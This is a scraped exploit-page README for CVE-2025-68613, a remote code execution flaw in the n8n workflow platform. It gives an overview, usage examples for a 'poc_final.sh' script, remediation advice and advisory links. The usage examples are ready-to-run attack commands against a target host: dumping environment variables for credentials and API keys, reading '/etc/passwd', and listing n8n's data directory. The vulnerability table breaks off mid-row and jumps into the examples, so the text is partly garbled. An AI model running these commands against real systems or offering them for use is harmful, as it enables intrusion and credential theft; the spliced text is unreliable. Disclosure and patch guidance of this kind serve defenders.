## https://sploitus.com/exploit?id=9C444357-CCE0-54A3-80AA-4417A3AB1F9F
# CVE-2025-68613 โ n8n RCE via Expression Injection
> **For educational and authorized security research purposes only.**
## Overview
Critical RCE vulnerability (CVSS 9.9) in n8n workflow automation platform. Authenticated users can execute arbitrary OS commands via the `executeCommand` node, bypassing sandbox restrictions.
| Field | Detail |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (Critical) |
| Affected versions | >= 0.211.0
```
**Examples:**
```bash
# Basic RCE
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'id'
# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'env'
# Read sensitive files
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'cat /etc/passwd'
# List n8n data directory
bash poc_final.sh http://target:5678 user@example.com 'Password1!' 'ls -la ~/.n8n/'
```
> **Note:** If your password contains special characters like `!`, use single quotes.
## Remediation
Upgrade to **n8n >= 1.120.4** immediately.
If upgrading is not immediately possible:
- Restrict workflow creation and editing to fully trusted users only
- Run n8n with minimal OS privileges
- Use network segmentation to limit exposure
## References
- [n8n Security Advisory GHSA-v98v-ff95-f3cp](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp)
- [NVD โ CVE-2025-68613](https://nvd.nist.gov/vuln/detail/CVE-2025-68613)
## Disclaimer
This tool is provided for **educational purposes and authorized security testing only**. Unauthorized use against systems you do not own or have explicit written permission to test is illegal. The author is not responsible for any misuse.